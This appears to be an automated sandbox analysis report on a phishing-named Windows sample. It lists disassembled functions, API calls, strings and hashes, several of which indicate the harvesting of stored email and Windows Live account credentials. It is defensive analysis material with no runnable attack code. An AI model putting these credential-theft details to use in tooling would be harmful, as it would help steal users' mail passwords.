                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A5D
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A74
                                                                                                                                                                                                                                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00409C2C,?,?,00000000,76940A60,?,00000000), ref: 00409A7D
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,00000000,76940A60,?,00000000), ref: 00409C53
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,00000000,76940A60,?,00000000), ref: 00409C6F
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0wE,00000014,?,?,00000000,76940A60), ref: 00409C97
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,0wE,00000010,?,0wE,00000014,?,?,00000000,76940A60), ref: 00409CB4
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D3D
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D47
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,00000000,76940A60), ref: 00409D7F
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76940A60), ref: 00408EBE
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76940A60), ref: 00408E31
                                                                                                                                                                                                                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                                          • String ID: 0wE$d
                                                                                                                                                                                                                                          • API String ID: 2915808112-1552800882
                                                                                                                                                                                                                                          • Opcode ID: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                          • Instruction ID: 1be057752684aea17f507b8882d339e9c418a93e0b7bc1648df0d3b0eb18cc96
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed916fde650882a961c0d1d8ab7e73890c0a1d0683c4cd4983fb3a7ffada175a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4513B71A01704AFEB24DF29D542B9AB7E4FF88314F10852EE55ADB382DB74E940CB44
                                                                                                                                                                                                                                          Function 00403166 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040327B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                                          • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                                          • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                                          • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                          • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                                                                                                                                                                                                          Function 00411004 Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memcpy
                                                                                                                                                                                                                                          • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                          • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                          • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                          • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                                                                                                                                                                                                          Function 00405E69 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 00405E80
                                                                                                                                                                                                                                          • GetWindow.USER32(?,00000005), ref: 00405E98
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000), ref: 00405E9B
                                                                                                                                                                                                                                            • Part of subcall function 004015B0: GetWindowRect.USER32(?,?), ref: 004015BF
                                                                                                                                                                                                                                            • Part of subcall function 004015B0: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015DA
                                                                                                                                                                                                                                          • GetWindow.USER32(00000000,00000002), ref: 00405EA7
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EBE
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405ED0
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,00000000), ref: 00405EE2
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003ED), ref: 00405EF0
                                                                                                                                                                                                                                          • SetFocus.USER32(00000000), ref: 00405EF3
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2432066023-0
                                                                                                                                                                                                                                          • Opcode ID: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                                          • Instruction ID: 6786727c0aa7fef6bca0c81d499308ec00879f235530f9e7c86c655f771e1d73
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ed905a81be40d412dce536e6719fe7cdedab364c991d1c90f2ea44b29e4445c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B801A571500305EFDB116F76DC8AF6BBFACEF81755F05442AB4049B191CBB8E8018A28
                                                                                                                                                                                                                                          Function 0040F96C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040FA1E
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                                                                                                                                                          • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                                                                                                                                                          • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                                                                                                                                                          • API String ID: 945165440-3589380929
                                                                                                                                                                                                                                          • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                          • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                                                                                                                                                                                                          Function 004036E5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                                                                                                                                                            • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                                                                                                                                                            • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                                                                                                                                                            • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                                                                                                                                                          • strchr.MSVCRT ref: 0040371F
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                                                                                                                                                          • strlen.MSVCRT ref: 00403778
                                                                                                                                                                                                                                          • sprintf.MSVCRT ref: 0040379C
                                                                                                                                                                                                                                          • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                                                                                                                                                          • String ID: %s@gmail.com
                                                                                                                                                                                                                                          • API String ID: 3261640601-4097000612
                                                                                                                                                                                                                                          • Opcode ID: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                          • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 11ccb4e93ce9d0da07274c25f249dad5774019e44f0a519d17107d0dc001407b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                                                                                                                                                                                                          Function 004094A2 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 004094C8
                                                                                                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                                                                                                                                                          • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040950C
                                                                                                                                                                                                                                          • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 00409531
                                                                                                                                                                                                                                            • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                                                                                                                                                          • String ID: sysdatetimepick32
                                                                                                                                                                                                                                          • API String ID: 3411445237-4169760276
                                                                                                                                                                                                                                          • Opcode ID: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                          • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20710c655bcd130c2a45dbc3c3fabc14bf10f5b62d17aada42eac2fe00d5bba0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                                                                                                                                                                                                          Function 00405983 Relevance: 12.2, APIs: 8, Instructions: 200windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                                                                                                                                                            • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                                                                                                                                                            • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                                                                                                                                                            • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                                                                                                                                                          • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                                                                                                                                                          • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Item$DialogMessageSend
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2485852401-0
                                                                                                                                                                                                                                          • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                          • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                                                                                                                                                                                                                          Function 0040B38F Relevance: 12.1, APIs: 8, Instructions: 108windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                                                                                                                                                          • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                                                                                                                                                          • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                                                                                                                                                          • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                                                                                                                                                          • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                                                                                                                                                          • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                                                                                                                                                          • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3642520215-0
                                                                                                                                                                                                                                          • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                          • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                                                                                                                                                                                                          Function 00405BD9 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00405C3B
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                                                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2313361498-0
                                                                                                                                                                                                                                          • Opcode ID: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                          • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20fe0494e672a329d8c574fdcc403b16352a75b97cc0102977cb83616af43d0a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                                                                                                                                                                                                                          Function 0040BB14 Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                                                                                                                                                          • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                                                                                                                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                                                                                                                                                          • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Window$Defer$Rect$BeginClient
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2126104762-0
                                                                                                                                                                                                                                          • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                          • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                                                                                                                                                                                                                          Function 004072D6 Relevance: 12.1, APIs: 8, Instructions: 72COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                                                                                                                                                          • GetDC.USER32(00000000), ref: 004072FB
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                                                                                                                                                          • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                                                                                                                                                          • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                                                                                                                                                          • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                                                                                                                                                          • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.2979448334.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.2979448334.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                                                                                                                                                          • String ID:
